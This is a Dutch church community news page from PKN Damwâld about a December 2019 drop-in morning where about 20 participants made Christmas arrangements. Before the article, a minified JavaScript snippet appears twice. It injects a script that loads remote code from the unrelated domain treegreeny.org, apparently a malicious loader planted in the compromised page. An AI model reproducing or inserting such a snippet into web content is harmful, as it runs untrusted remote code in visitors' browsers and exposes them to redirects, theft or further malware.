;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Inloopochtend It Trefpunt: Kerststuk maken op 5 december 2019 - PKN Damwâld

Inloopochtend It Trefpunt: Kerststuk maken op 5 december 2019

Gepubliceerd op: maandag 9 december 2019

De vorige inloop maar ook daarna kon iedereen zich opgeven om te knutselen. Heel veel Inlopers hadden zich tijdig opgegeven, waarschijnlijk om straks te pronken met hun creativiteit voor familie tijdens de Kerst. Ook deze keer was Griet Rozendal weer bereid om deze knutselmorgen voor te bereiden. Dit betekent onder andere bedenken wat er gemaakt moet en kan worden in ongeveer 1 uurtje, maar ook de struiken en boompjes in eigen tuin (en naburig bos??) snoeien en zaken kopen zoals potten en oase, dennenappeltjes, rode bolletjes enz… Kortom een hele klus, die ze alleen met hulp van haar Wessel heeft geklaard. Behalve voorbereiden heeft Griet met veel kennis en enthousiasme de ochtend geleid en instructies gegeven aan ruim 20 leerlingen!! Het liep als een trein en de resultaten zijn geweldig, bekijkt u de foto’s maar!

Wij, organisatie en deelnemers, willen Griet en Wessel heel hartelijk danken voor hun spontane bereidwilligheid en inzet. Het was geweldig en daar kwam nog bij dat het niets kostte. Griet vroeg alleen een ieder om 1 euro in onze pot te doen voor activiteiten van de Inloop. Woorden schieten te kort.

Niet iedereen deed eraan mee. Anderen waren gezellig aan het rummikuppen, sjoelen of gewoon gezellig aan het kletsen. Het was al met al een zeer geslaagde ochtend met heel veel aanwezigen.

Deze ochtend was voor het eerst ook doel van een studie object: 2 jongedames, stagiaires bij stichting Welzijn het Bolwerk Dokkum, waren aanwezig in het kader van hun HBO studie gericht op Sociaal werk. Zij en nog 2 anderen gaan zoveel mogelijk activiteiten als onze inloop in Dantumadiel bijwonen en in kaart brengen. Te zijner tijd moeten deze onderzoeken resulteren in duidelijk inzicht en overzicht voor iedereen die op zoek is naar ontspanning, afleiding en gezellige contacten. Dames heel veel plezier en succes bij jullie studie.

De volgende inloop is op 19 december as. dus vlak voor de kerst. Net als de laatste keer, organiseren wij geen kerstbrunch omdat velen al 1 of meerdere etentjes hebben rond kerst. Begin dit jaar hadden wij daarom op 17 januari een stampotten lunch. In januari 2020 gaan we weer een brunch/lunch of iets dergelijks organiseren. Ruim van te voren komen we met nadere informatie over wanneer/hoe opgeven en op welke datum in januari. We heten nu alvast iedereen, ook nieuwe gasten, van harte welkom.